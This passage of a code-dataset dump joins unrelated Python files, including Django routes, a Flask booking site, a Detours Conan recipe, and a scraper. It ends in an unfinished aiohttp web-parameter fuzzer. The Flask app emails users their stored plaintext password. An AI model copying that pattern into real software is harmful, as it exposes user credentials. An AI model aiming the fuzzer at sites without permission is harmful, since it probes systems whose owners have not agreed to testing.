`urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/4.2/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. 
Add a URL to urlpatterns:  path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path\n\nfrom liberty_test_task import views\n\nurlpatterns = [\n    path(\"admin/\", admin.site.urls),\n    path(\"posts\", views.get_posts),\n    path(\"comments\", views.get_comments),\n    path(\"posts/\", views.get_post),\n    path(\"comments/\", views.get_comment),\n    path(\"refetch_posts_and_comments\", views.refetch_posts_and_comments),\n]\n","repo_name":"spiridonovfed/LibertyTest","sub_path":"liberty_test_task/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1056,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"37314006098","text":"import urllib\nimport pyodbc\nfrom contextlib import contextmanager\n\nimport sqlalchemy\nimport sqlalchemy.orm\nimport db.db_folder as db_folder\nfrom models.model_base import ModelBase\n# noinspection PyUnresolvedReferences\nfrom models import storage, item\n\n\n__factory = None\n\n\ndef global_init():\n    global __factory\n\n    # full_file = db_folder.get_db_path('food_helper.sqlite.db')\n    # connection_string = 'sqlite:///' + full_file\n\n    params = urllib.parse.quote_plus(r'Driver={ODBC Driver 13 for SQL Server};Server=tcp:food-helper-server.database.windows.net,1433;Database=food_helper_db;Uid=;Pwd=;Encrypt=yes;TrustServerCertificate=no;Connection Timeout=30;')\n    connection_string = 'mssql+pyodbc:///?odbc_connect={}'.format(params)\n\n    engine = sqlalchemy.create_engine(connection_string, echo=True)\n    ModelBase.metadata.create_all(engine)\n\n    __factory = sqlalchemy.orm.sessionmaker(bind=engine)\n\n\n@contextmanager\ndef get_session():\n    # create the session before the try block so 'session' is always bound\n    # in the except/finally clauses, even if creation itself fails\n    session = create_session()\n\n    try:\n        yield session\n        session.commit()\n    except:\n        session.rollback()\n        raise\n    finally:\n        session.close()\n\n\ndef create_session():\n    global __factory\n\n    if __factory is None:\n        global_init()\n\n    return __factory()\n","repo_name":"vladimir-sulima/food_helper","sub_path":"data/session_factory.py","file_name":"session_factory.py","file_ext":"py","file_size_in_byte":1257,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"11887857169","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Sep  5 18:38:00 2020\n\n@author: avmejia\n\"\"\"\n\nimport unittest\n\nimport fuzzy\nimport vocales\n\n\nclass Testprueba (unittest.TestCase):\n    \n    temperatura =[[10,20,30,40],\n                  [20,30,40,50],\n                  [30,40,50,60],\n                  [40,50,60,70]]\n    \n    def test_fuzyy(self):\n        self.assertEqual(fuzzy.calculo_membresia(self.temperatura,5),[0, 0, 0, 0])\n        self.assertEqual(fuzzy.calculo_membresia(self.temperatura,25),[1, 0.5, 0, 0])\n        self.assertEqual(fuzzy.calculo_membresia(self.temperatura,42),[0, 0.8, 1, 0.2])\n    \n    def test_vocales(self):\n        self.assertEqual(vocales.cuenta_vocales(\"bibliotecario\"),[7,6])\n        self.assertEqual(vocales.cuenta_vocales(\"biblioteca\"),[5,5])\n        self.assertEqual(vocales.cuenta_vocales(\"mimamamemima\"),[6,6])\n    \n    \nif __name__ == '__main__':\n    unittest.main()\n\n","repo_name":"AD21-TC1028/TC1028.414.integrador","sub_path":"test1.py","file_name":"test1.py","file_ext":"py","file_size_in_byte":927,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"18493520748","text":"import os\nimport pandas as pd\nfrom tqdm import tqdm\nfrom datetime import datetime\n\nfrom common_utilities import value_valid_mix\nfrom madrid_utilities import madrid_data_dir, convert_station_number, 
useless_col, station_col_old, date_columns, \\\n madrid_all_file, pollutant_col_old, pollutant_dict_madrid, concentration_col, datetime_col, pollutant_col,\\\n station_col, is_relevant_pollutant\n\nvalid_col = \"valid\"\nhour_col = \"hour\"\n\n\ndef get_year_directories(data_dir):\n \"\"\"Returns the list of all directories with yearly data\n\n :param data_dir: data directory\n :type data_dir: str\n :return: list of all directories with yearly data\n :rtype: list\n \"\"\"\n return [f for f in os.listdir(data_dir) if os.path.isdir(os.path.join(data_dir, f)) and len(f) == 4]\n\n\ndef get_all_stations(data_dir):\n \"\"\"Returns the list of all measurement stations\n\n :param data_dir: data directory\n :type data_dir: str\n :return: list of all stations\n :rtype: list\n \"\"\"\n list_dir = sorted(get_year_directories(data_dir=data_dir))\n most_recent_dir = os.path.join(data_dir, list_dir[-1])\n most_recent_file = os.listdir(most_recent_dir)[0]\n data = open_clean_df(filename=os.path.join(most_recent_dir, most_recent_file))\n data[station_col] = data[station_col].apply(convert_station_number)\n return list(data[station_col].unique())\n\n\ndef open_year_dir(dir_path):\n \"\"\"Opens, cleans and joins all dataframe of one directory.\n\n :param dir_path: directory path\n :type dir_path: str\n :return: yearly data\n :rtype: pd.DataFrame\n \"\"\"\n file_list = os.listdir(dir_path)\n df_list = [open_clean_df(os.path.join(dir_path, file)) for file in file_list]\n return pd.concat(df_list, axis=0)\n\n\ndef open_clean_df(filename):\n \"\"\"Extract data from a file\n\n :param filename: filename\n :type filename: str\n :return data: year data\n :rtype data: pd.DataFrame\n \"\"\"\n data = pd.read_csv(filename, sep=\";\")\n data.drop(useless_col, axis=1, inplace=True)\n data.columns = [x if x != pollutant_col_old else pollutant_col for x in data.columns]\n data.columns = [x if x != station_col_old else station_col for x in data.columns]\n data = data[data[pollutant_col].apply(is_relevant_pollutant)]\n return data\n\n\ndef cols2datetime(x):\n \"\"\"Convert multiple columns to datetime format\n\n :param x: iterable containing year, month, day and a string idetifying the hour of the day\n :type x: iterable\n :return: datetime\n :rtype: datetime.datetime\n \"\"\"\n return datetime(year=x[0], month=x[1], day=x[2], hour=int(x[3][1:])-1)\n\n\ndef convert_from_year_df(data):\n \"\"\"Extract a station data from yearly data\n\n :param data: year data\n :type data: pd.DataFrame\n :return res_data: station data\n :rtype res_data: pd.DataFrame\n \"\"\"\n hours_cols = [col for col in data.columns if col.startswith(\"H\")]\n valid_cols = [col for col in data.columns if col.startswith(\"V\")]\n useful_cols = [col for col in data.columns if col not in hours_cols+valid_cols]\n melted_hour_df = pd.melt(data, id_vars=useful_cols, value_vars=hours_cols, var_name=hour_col,\n value_name=concentration_col)\n melted_valid_df = pd.melt(data, id_vars=[], value_vars=valid_cols, var_name=hour_col,\n value_name=valid_col)\n melted_hour_df[valid_col] = melted_valid_df[valid_col].apply(lambda x: x == \"V\")\n melted_hour_df[datetime_col] = melted_hour_df[date_columns + [hour_col]].apply(cols2datetime, axis=1)\n melted_hour_df[concentration_col] = melted_hour_df[[concentration_col, valid_col]].apply(value_valid_mix, axis=1)\n melted_hour_df.drop(date_columns + [hour_col, valid_col], axis=1, inplace=True)\n return melted_hour_df\n\n\ndef extract_all_ts(data_dir):\n \"\"\"Returns the list of all measurement stations\n\n :param data_dir: data 
directory\n :type data_dir: str\n :return: list of all stations\n :rtype: list\n \"\"\"\n year_dirs = get_year_directories(data_dir)\n all_df = pd.concat([convert_from_year_df(open_year_dir(dir_path=os.path.join(data_dir, year_dir)))\n for year_dir in tqdm(year_dirs)], axis=0)\n all_df.reset_index(inplace=True, drop=True)\n all_df[station_col] = all_df[station_col].apply(int)\n all_df[pollutant_col] = all_df[pollutant_col].apply(int)\n all_df[pollutant_col] = all_df[pollutant_col].apply(lambda x: pollutant_dict_madrid[x])\n return all_df\n\n\nif __name__ == \"__main__\":\n all_df = extract_all_ts(data_dir=madrid_data_dir)\n all_df.to_pickle(madrid_all_file)\n","repo_name":"LoreFio/PhD_ts_data_prep","sub_path":"madrid_extract.py","file_name":"madrid_extract.py","file_ext":"py","file_size_in_byte":4563,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"31937965895","text":"import os\n\nfrom conan import ConanFile\nfrom conan.errors import ConanInvalidConfiguration\nfrom conan.tools.build import stdcpp_library\nfrom conan.tools.cmake import CMake, CMakeToolchain, cmake_layout\nfrom conan.tools.files import chdir, copy, get, replace_in_file\nfrom conan.tools.microsoft import is_msvc, is_msvc_static_runtime, msvc_runtime_flag, VCVars\n\nrequired_conan_version = \">=1.53.0\"\n\n\nclass DetoursConan(ConanFile):\n name = \"detours\"\n description = \"Detours is a software package for monitoring and instrumenting API calls on Windows\"\n license = \"MIT\"\n url = \"https://github.com/conan-io/conan-center-index\"\n homepage = \"https://github.com/microsoft/Detours\"\n topics = (\"monitoring\", \"instrumenting\", \"hook\", \"injection\", \"windows\")\n\n package_type = \"static-library\"\n settings = \"os\", \"arch\", \"compiler\", \"build_type\"\n\n @property\n def _target_processor(self):\n return {\n \"x86\": \"X86\",\n \"x86_64\": \"X64\",\n \"armv7\": \"ARM\",\n \"armv8\": \"ARM64\",\n }[str(self.settings.arch)]\n\n def export_sources(self):\n copy(self, \"CMakeLists.txt\", src=self.recipe_folder, dst=self.export_sources_folder)\n\n def layout(self):\n cmake_layout(self, src_folder=\"src\")\n\n def validate(self):\n if self.settings.os != \"Windows\":\n raise ConanInvalidConfiguration(\"Only os=Windows is supported\")\n if is_msvc(self) and not is_msvc_static_runtime(self):\n # Debug and/or dynamic runtime is undesired for a hooking library\n raise ConanInvalidConfiguration(\"Only static runtime is supported (MT)\")\n if self.settings.build_type != \"Release\":\n raise ConanInvalidConfiguration(\"Detours only supports the Release build type\")\n try:\n self.output.info(f\"target process is {self._target_processor}\")\n except KeyError:\n raise ConanInvalidConfiguration(\"Unsupported architecture\")\n\n def source(self):\n get(self, **self.conan_data[\"sources\"][self.version], strip_root=True)\n\n def generate(self):\n if is_msvc(self):\n vcvars = VCVars(self)\n vcvars.generate()\n else:\n tc = CMakeToolchain(self)\n tc.generate()\n\n def _patch_sources(self):\n if is_msvc(self):\n replace_in_file(\n self,\n os.path.join(self.source_folder, \"src\", \"Makefile\"),\n \"/MT \",\n f\"/{msvc_runtime_flag(self)} \",\n )\n\n def build(self):\n self._patch_sources()\n if is_msvc(self):\n with chdir(self, os.path.join(self.source_folder, \"src\")):\n self.run(f\"nmake DETOURS_TARGET_PROCESSOR={self._target_processor}\")\n else:\n cmake = CMake(self)\n cmake.configure(build_script_folder=self.source_path.parent)\n cmake.build()\n\n def 
package(self):\n copy(self, \"LICENSE.md\", src=self.source_folder, dst=os.path.join(self.package_folder, \"licenses\"))\n if is_msvc(self):\n copy(self, \"detours.lib\",\n src=os.path.join(self.source_folder, f\"lib.{self._target_processor}\"),\n dst=os.path.join(self.package_folder, \"lib\"))\n copy(self, \"*.h\",\n src=os.path.join(self.source_folder, \"include\"),\n dst=os.path.join(self.package_folder, \"include\"))\n else:\n cmake = CMake(self)\n cmake.install()\n\n def package_info(self):\n self.cpp_info.bindirs = []\n self.cpp_info.frameworkdirs = []\n self.cpp_info.resdirs = []\n self.cpp_info.libs = [\"detours\"]\n if self.settings.compiler == \"gcc\":\n self.cpp_info.system_libs = [stdcpp_library(self)]\n self.cpp_info.link_flags = [\"-static-libgcc\", \"-static-libstdc++\"]\n","repo_name":"conan-io/conan-center-index","sub_path":"recipes/detours/all/conanfile.py","file_name":"conanfile.py","file_ext":"py","file_size_in_byte":3840,"program_lang":"python","lang":"en","doc_type":"code","stars":835,"dataset":"github-code","pt":"77"} +{"seq_id":"5080782578","text":"from bson.objectid import ObjectId\nfrom tinydb import TinyDB, Query\n\nfrom database.Database import Database\nfrom exceptions.DatabaseException import DatabaseException\nfrom exceptions.NotFoundException import NotFoundException\nfrom util.BasePath import get_base_path\n\n\nclass TinyDatabase(Database):\n \"\"\"\n This class implements the abstract class Database. \n This database is document oriented.\n It has several methods for this communication.\n \"\"\"\n\n def __init__(self, database_name):\n database_path = get_base_path() + \"/database/tinydbData/\"\n self._devices = TinyDB(database_path + database_name + '.json')\n\n def get_all_devices(self):\n \"\"\"Instantiates all devices in database\"\"\"\n devices = []\n for data in self._devices.all():\n _id = data[\"_id\"]\n device = self._get_class(data[\"module\"], data[\"class\"])(self, _id)\n devices.append(device)\n return devices\n\n def get_device(self, device_id):\n \"\"\"Instantiates the device with the given device_id\"\"\"\n data = self.__get_device_data(device_id)\n device = self._get_class(data[\"module\"], data[\"class\"])\n return device(self, device_id)\n\n def add_device(self, plugin):\n \"\"\"Adds the given plugin info as a new device\"\"\"\n plugin[\"_id\"] = str(ObjectId())\n self._devices.insert(plugin)\n\n def delete_all_devices(self):\n self._devices.purge_tables()\n\n def delete_device(self, device_id):\n query = Query()\n self._devices.remove(query._id == device_id)\n\n def update_field(self, device_id, field, new_value):\n query = Query()\n self._devices.update({field: new_value}, query._id == device_id)\n\n def get_field(self, device_id, field):\n data = self.__get_device_data(device_id)\n return data[field]\n\n def get_activator_field(self, device_id, activator_id, field):\n data = self.__get_device_data(device_id)\n activator = self.__get_activator(data, activator_id)\n return activator[field]\n\n def update_activator_field(self, device_id, activator_id, field, new_value):\n query = Query()\n data = self.__get_device_data(device_id)\n activators = data[\"activators\"]\n activator = activators[activator_id]\n activator[field] = new_value\n self._devices.update({\"activators\": activators}, query._id == device_id)\n\n def __get_device_data(self, device_id):\n query = Query()\n devices = self._devices.search(query._id == device_id)\n if len(devices) > 1:\n message = \"Inconsistent database, more then one device with the same id\"\n raise 
DatabaseException(\"tiny\", message)\n elif len(devices) == 0:\n raise NotFoundException(\"device\")\n else:\n return devices[0]\n\n @staticmethod\n def __get_activator(data, activator_id):\n try:\n return data[\"activators\"][activator_id]\n except KeyError:\n raise NotFoundException(\"activator\")\n","repo_name":"RUGSoftEng/2017-Hestia-Server","sub_path":"source/database/TinyDatabase.py","file_name":"TinyDatabase.py","file_ext":"py","file_size_in_byte":3033,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"35498121713","text":"from flask import render_template, request, redirect, session\nfrom app import app\nfrom app import db, models, mail\nfrom .functions import *\nfrom flask_mail import Mail, Message\nimport os\nimport datetime, time\n\n\n# p = models.Users(name=\"Test\", password=\"test\", email=\"testnetwork49@gmail.com\", phoneNumber=123456789, gender=0, accountType=1, disability=0)\n# db.session.add(p);\n# db.session.commit();\n# p = models.Users.query.all();\n# for q in p:\n# print(q.name);\n# db.session.commit();\n\n# if not logged_in(session, 1):\n # return redirect(\"/\", code=302);\n\n# INDEX PAGE\n@app.route('/', methods=['POST','GET'])\ndef index():\n apply_for_instructor(request)\n schedule_course(request)\n return render_template('index.html')\n\n@app.route('/index', methods=['POST','GET'])\ndef urlindex():\n apply_for_instructor(request)\n return redirect(\"/\", code=302)\n\n# LOGIN PAGE\n@app.route('/page-login', methods=['POST','GET'])\ndef page_login():\n login(request,session)\n # return redirect(\"/user-page\", code=302)\n if logged_in(session, 0):\n return redirect(\"/user-page\", code=302)\n if logged_in(session, 1):\n return redirect(\"/admin\", code=302)\n apply_for_instructor(request)\n return render_template('page-login.html')\n\n# FORGOT PASSWORD PAGE\n@app.route('/forget-password', methods=['POST','GET'])\ndef forget_password():\n if request.method == \"POST\":\n p = models.Users.query.filter_by(email=request.form[\"email\"]).first()\n if p:\n msg = Message(\"Your password\")\n msg.body = \"Use this password to login: \" + p.password;\n msg.recipients = [p.email]\n mail.send(msg)\n return redirect(\"/page-login\", code=302)\n return render_template('forget-password.html')\n\n# ADMIN PAGE\n@app.route('/admin', methods=['POST', 'GET'])\ndef admin():\n if not logged_in(session, 1):\n return redirect(\"/page-login\", code=302)\n apply_for_instructor(request)\n create_area(request)\n if delete_area(request):\n return redirect(\"/admin\", code=302)\n create_course(request)\n if delete_course(request):\n return redirect(\"/admin\", code=302)\n create_trainer(request)\n if delete_trainer(request):\n return redirect(\"/admin\", code=302)\n schedule_course(request)\n if delete_schedule(request):\n return redirect(\"/admin\", code=302)\n create_user(request)\n users = models.Users.query.filter_by(accountType=0).all()\n areas = models.Areas.query.all()\n trainers = models.Trainers.query.all()\n courses = models.Courses.query.all()\n schedules = models.course_schedule.query.all()\n bookings = models.user_booking.query.all()\n rawschedules = models.rawcourse_schedule.query.all()\n return render_template('admin.html', users=users, areas=areas, trainers=trainers, courses=courses, schedules=schedules, bookings=bookings, rawschedules=rawschedules)\n\n# Admin PAGE\n@app.route('/admin-user-management', methods=['POST', 'GET'])\ndef admin_user_management():\n if not logged_in(session, 1):\n return 
redirect(\"/page-login\", code=302)\n if request.args.get('user') == None:\n return redirect(\"/admin\", code=302)\n print(request.args.get('user'))\n p = models.Users.query.filter_by(id=request.args.get('user')).first()\n bookings = models.user_booking.query.filter_by(userId=p.id).all()\n schedules = models.course_schedule.query.all()\n rawschedules = models.rawcourse_schedule.query.all()\n unixdays = time.time() + 3600 / 86400\n apply_for_instructor(request)\n return render_template('admin-user-management.html', user=p, bookings=bookings, rawschedules=rawschedules, schedules=schedules, unixdays=unixdays)\n\n# Admin PAGE\n@app.route('/admin-user-edit-details', methods=['POST', 'GET'])\ndef admin_user_edit_details():\n if not logged_in(session, 1):\n return redirect(\"/page-login\", code=302)\n # apply_for_instructor(request)\n return render_template('admin-user-edit-details.html')\n\n# USER PAGE\n@app.route('/user-page', methods=['POST', 'GET'])\ndef user_page():\n if not logged_in(session, 0):\n return redirect(\"/page-login\", code=302)\n if bookcourse(request,session):\n return redirect(\"/user-page\", code=302)\n if deletebooking(request,session):\n return redirect(\"/user-page\", code=302)\n apply_for_instructor(request)\n p = models.Users.query.filter_by(email=session['user'], session=session['randomid']).first();\n unixdays = time.time() + 3600 / 86400\n bookings = models.user_booking.query.filter_by(userId=p.id).all()\n schedules = models.course_schedule.query.all()\n rawschedules = models.rawcourse_schedule.query.all()\n return render_template('user-page.html', p=p, unixtime=unixdays, bookings=bookings, test=request.args.get('delcourse'), rawschedules=rawschedules, schedules=schedules)\n\n# USER PAGE\n@app.route('/logout', methods=['POST', 'GET'])\ndef logout():\n session.clear()\n # apply_for_instructor(request)\n return redirect(\"/\", code=302)\n\n# CONTACT US PAGE\n@app.route('/contact-us', methods=['POST','GET'])\ndef contact_us():\n # contact_process(request);\n # apply_for_instructor(request)\n return render_template('contact-us.html')\n\n# CALENDER PAGE\n@app.route('/calendar', methods=['POST', 'GET'])\ndef calender():\n if not logged_in(session, 1):\n return redirect(\"/page-login\", code=302)\n apply_for_instructor(request)\n\n daycount = float(time.time() + 3600 / 86400)\n days = []\n nextdays = []\n nextnextdays = []\n occupiedAreaDays = []\n while(len(days) < 31):\n days.insert(-1, datetime.datetime.fromtimestamp(int(daycount)).strftime('%Y-%m-%d'))\n occupiedAreaDays.insert(-1, False)\n daycount += 86400\n days = [days[-1]] + days\n days.pop()\n while(len(nextdays) < 31):\n nextdays.insert(-1, datetime.datetime.fromtimestamp(int(daycount)).strftime('%Y-%m-%d'))\n occupiedAreaDays.insert(-1, False)\n daycount += 86400\n nextdays = [nextdays[-1]] + nextdays\n nextdays.pop()\n while(len(nextnextdays) < 31):\n nextnextdays.insert(-1, datetime.datetime.fromtimestamp(int(daycount)).strftime('%Y-%m-%d'))\n occupiedAreaDays.insert(-1, False)\n daycount += 86400\n nextnextdays = [nextnextdays[-1]] + nextnextdays\n nextnextdays.pop()\n\n p = models.course_schedule.query.filter_by(areaId=request.args.get('room')).all()\n for q in p:\n a = models.Courses.query.filter_by(id=q.courseId).first()\n combinations = '{0:07b}'.format(q.combination)\n daycount = float(time.time() + 3600 / 86400)\n count = 0\n i = 0 # Combination number\n while count != a.duration:\n if combinations[i] == \"1\":\n print(\"test\")\n occupiedAreaDays[int(daycount) - int(float(time.time() + 3600 / 86400))] 
= True\n count += 1 # Dont exceed duration\n i += 1# Combination number\n if len(combinations) == i:\n i = 0\n daycount += 1\n print(occupiedAreaDays)\n return render_template('calendar.html', occupied=occupiedAreaDays, areas=p, days=days, nextdays=nextdays, nextnextdays=nextnextdays)\n\n# EDIT DETAILS PAGE\n@app.route('/edit-details', methods=['POST', 'GET'])\ndef edit_details():\n if not logged_in(session, 0):\n return redirect(\"/page-login\", code=302)\n apply_for_instructor(request)\n return render_template('edit-details.html')\n\n# POPULAR COURSES PAGE\n@app.route('/popular_courses', methods=['POST', 'GET'])\ndef popular_courses():\n # UpcomingEvents()\n apply_for_instructor(request)\n return render_template('popular_courses.html')\n\n# POPULAR COURSE1 PAGE\n@app.route('/popular_course1', methods=['POST', 'GET'])\ndef popular_course1():\n # UpcomingEvents()\n apply_for_instructor(request)\n return render_template('popular_course1.html')\n\n# POPULAR COURSE2 PAGE\n@app.route('/popular_course2', methods=['POST', 'GET'])\ndef popular_course2():\n # UpcomingEvents()\n apply_for_instructor(request)\n return render_template('popular_course2.html')\n\n# POPULAR COURSE3 PAGE\n@app.route('/popular_course3', methods=['POST', 'GET'])\ndef popular_course3():\n # UpcomingEvents()\n apply_for_instructor(request)\n return render_template('popular_course3.html')\n\n# POPULAR COURSE4 PAGE\n@app.route('/popular_course4', methods=['POST', 'GET'])\ndef popular_course4():\n # UpcomingEvents()\n apply_for_instructor(request)\n return render_template('popular_course4.html')\n\n# POPULAR COURSE5 PAGE\n@app.route('/popular_course5', methods=['POST', 'GET'])\ndef popular_course5():\n # UpcomingEvents()\n apply_for_instructor(request)\n return render_template('popular_course5.html')\n\n# POPULAR COURSE6 PAGE\n@app.route('/popular_course6', methods=['POST', 'GET'])\ndef popular_course6():\n # UpcomingEvents()\n apply_for_instructor(request)\n return render_template('popular_course6.html')\n","repo_name":"Emharsh/Projects","sub_path":"Software Project-Website with database/Serverimplemented/flask/app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":8897,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"10217068576","text":"from bs4 import BeautifulSoup\nimport requests\nimport json\n\ninstagram = 'https://www.instagram.com'\n\n# usuario = input('Ingrese el usuario: ')\n# url = instagram + '/' + usuario\n# print('Usuario : ', usuario)\n\nurl = instagram + '/' + 'leomessi' # prueba con Lionel Messi\nprint('Usuario : leomessi')\nprint(\"URL del perfil: \" + url)\n\nresponse = requests.get(url)\n\nif response.ok:\n while response.ok:\n response = requests.get(url)\n html = response.text\n bs_html = BeautifulSoup(html, features=\"html.parser\")\n\n scripts = bs_html.select('script[type=\"application/ld+json\"]') # Extrae el script que contiene la cantidad de seguidores\n datos_json = json.loads(scripts[0].text.strip()) # Transforma a json\n mainEntityofPage = datos_json['mainEntityofPage']\n interactionStatistic = mainEntityofPage['interactionStatistic']\n userInteractionCount = interactionStatistic['userInteractionCount']\n\n print('Numero de seguidores: '+ userInteractionCount)\n","repo_name":"theexiled1/instagramFollowersTracker","sub_path":"followersTracker.py","file_name":"followersTracker.py","file_ext":"py","file_size_in_byte":1006,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} 
+{"seq_id":"4001484688","text":"\n# coding: utf-8\n\n# ## Initialization\n\n# In[1]:\n\n\nimport numpy as np\nimport pandas as pd\nimport keras\n\n\n# ## Importing the Data\n\n# In[2]:\n\n\ndataset_train = pd.read_csv(\"training.csv\")\ndataset_test = pd.read_csv(\"testing.csv\")\n\n\n# In[3]:\n\n\ndataset_test.head()\n\n\n# In[4]:\n\n\ndataset_train.head()\n\n\n# In[5]:\n\n\ndataset_test.shape\n\n\n# In[6]:\n\n\ndataset_train.shape\n\n\n# ## Create X and Y\n\n# In[7]:\n\n\nX_train = dataset_train.iloc[:, 1:6].values\nX_test = dataset_test.iloc[:, 1:6].values\nY_train = dataset_train.iloc[:, 0].values\nY_test = dataset_test.iloc[:, 0].values\n\n\n# In[8]:\n\n\nX_train.shape\n\n\n# In[9]:\n\n\nX_test.shape\n\n\n# In[10]:\n\n\nY_train.shape\n\n\n# In[11]:\n\n\nY_test.shape\n\n\n# ## Preprocess the Data\n\n# In[12]:\n\n\nfrom sklearn.preprocessing import LabelEncoder, StandardScaler\nle_Y = LabelEncoder()\nY_train = le_Y.fit_transform(Y_train)\nY_test = le_Y.transform(Y_test)\n\n\n# In[13]:\n\n\nY_train[0]\n\n\n# In[14]:\n\n\nY_test[0]\n\n\n# In[15]:\n\n\n# Scale the Data\nsc_X = StandardScaler()\nX_train = sc_X.fit_transform(X_train)\nX_test = sc_X.transform(X_test)\n\n\n# In[16]:\n\n\nX_train[0]\n\n\n# In[17]:\n\n\nX_test[0]\n\n\n# ## Create and Train the Classifier\n\n# In[18]:\n\n\nfrom keras.models import Sequential\nfrom keras.layers import Dense\n\n\n# In[19]:\n\n\nclf_ann = Sequential()\n\n# First Hidden Layer\nclf_ann.add(Dense(output_dim = 3, init = 'uniform', activation = 'relu', input_dim = 5))\n\n# Second Hidden Layer\nclf_ann.add(Dense(output_dim = 3, init = 'uniform', activation = 'relu'))\n\n# Output Layer\nclf_ann.add(Dense(output_dim = 1, init = 'uniform', activation = 'sigmoid'))\n\n# Compile the ANN\nclf_ann.compile(optimizer = 'adam', loss = 'binary_crossentropy', metrics = ['accuracy'])\n\n# Train the ANN on the Training Set\nclf_ann.fit(X_train, Y_train, batch_size = 10, nb_epoch = 100)\n\n\n# In[20]:\n\n\nY_pred = clf_ann.predict(X_test)\nY_pred = (Y_pred > 0.5)\n\n\n# ## Check the Accuracy\n\n# In[21]:\n\n\nfrom sklearn.metrics import accuracy_score, confusion_matrix\naccuracy_score(Y_test, Y_pred)\n\n\n# In[22]:\n\n\nconfusion_matrix(Y_test, Y_pred)\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"rinocs/MachineLearning-UCI","sub_path":"Wilt/Wilt_ANN_Classifier.py","file_name":"Wilt_ANN_Classifier.py","file_ext":"py","file_size_in_byte":2016,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"36891775749","text":"import asyncio\nfrom aiohttp import ClientSession\nimport requests\nimport hashlib\nimport aiohttp\nfrom src._print import _print\nimport time\nimport io\nfrom difflib import SequenceMatcher \n\nclass Fuzz(set):\n\n\tdef __init__(self,url):\n\n\t\tself.url = url.split('?')[0]\n\t\tself.queue1 = asyncio.Queue()\n\t\tself.queue2 = asyncio.Queue()\n\t\tself.loop = asyncio.get_event_loop()\n\t\tself.num = 100\n\t\tself.list = []\n\t\tself.headers = {\n 'User-agent': 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8',\n 'Accept-Language': 'Zh-CN, zh;q=0.8, en-gb;q=0.8, en-us;q=0.8',\n 'Accept-Encoding': 'identity',\n 'Keep-Alive': '300',\n 'Connection': 'keep-alive',\n 'Cache-Control': 'max-age=0',\n \t}\n\t\tself.param = url.split('?')[1].split('=')[0]\n\t\tself._print = _print()\n\t\tself.high_ratio = 0.70\n\t\tself.low_ratio = 0.02\n\n\tdef str_in_queue(self):\n\n\t\twith open('directroy/pathtotest_huge.txt','rb') as f:\n\t\t\twhile True:\n\t\t\t\tstring = 
f.readline().decode('utf-8').strip()\n\t\t\t\tif string:\n\t\t\t\t\tself.queue1.put_nowait(string)\n\t\t\t\telse:\n\t\t\t\t\tbreak\n\t\tself.length1 = self.queue1.qsize()\n \n\tdef get_param(self):\t\n\t\twith open('directroy/123.txt','r') as f1:\n\t\t\twhile True:\n\t\t\t\tparam = f1.readline().strip()\n\t\t\t\tif param:\n\t\t\t\t\tself.list.append(param)\n\t\t\t\telse:\n\t\t\t\t\tbreak\n\t\tself.length2 = len(self.list)\n\n\tdef origin_md5(self):\n\t\ttext = requests.get(self.url,headers = self.headers).text\n\t\tm = hashlib.md5()\n\t\tm.update(bytes(text,encoding = 'utf-8'))\n\t\tself.hex = m.hexdigest()\n\n\tdef get_ratio(self,res_text):\n\t\tseqm = SequenceMatcher()\n\t\ttext = requests.get(self.url,headers = self.headers).text\n\t\tseqm.set_seq1(text)\n\t\tseqm.set_seq2(res_text)\n\t\treturn seqm.ratio()\n\n\n\tasync def fuzz(self,param):\n\t\tsession = ClientSession()\n\t\twhile True:\n\t\t\tif not self.queue1.empty():\n\t\t\t\tstring = await self.queue1.get()\n\t\t\t\turl = self.url + '?' + str(param) + '=' + str(string)\n\t\t\t\ttry:\n\t\t\t\t\ttext = await self.get_response(url,session)\n\t\t\t\t\t#print(text)\n\t\t\t\t\tratio = self.get_ratio(text)\n\t\t\t\t\t#print(url,ratio)\n\t\t\t\t\tif ratio > self.low_ratio and ratio < self.high_ratio:\n\t\t\t\t\t\tself._print.fuzz_res(param,string)\n\t\t\t\t\tif ratio == 0:\n\t\t\t\t\t\tself._print.fuzz_res(param,string)\n\t\t\t\texcept:\n\t\t\t\t\tpass\n\t\t\telse:\n\t\t\t\t#print(param)\n\t\t\t\tawait session.close()\n\t\t\t\tbreak\n\n\tasync def get_response(self,url,session):\n\t\t\n\t\ts = await session.get(url,headers = self.headers)\n\t\treturn await s.text() \n\n\tdef make_cor(self):\n\n\t\tif self.length2 == 1:\n\n\t\t\tself.tasks = [self.fuzz(self.param) for i in range(self.num)]\n\t\t\tself.loop.run_until_complete(asyncio.wait(self.tasks))\n\t\telse:\n\t\t\tfor param in self.list:\n\t\t\t\tself.tasks = [self.fuzz(param) for i in range(self.num)]\n\t\t\t\tself.loop.run_until_complete(asyncio.wait(self.tasks))\n\t\t\t\tself.str_in_queue()\n\n\tdef start(self):\n\n\t\tself._print.print_info(\"Start fuzz : %s\" % time.strftime(\"%H:%M:%S\"))\n\t\ttime0 = time.time()\n\t\tif self.param == 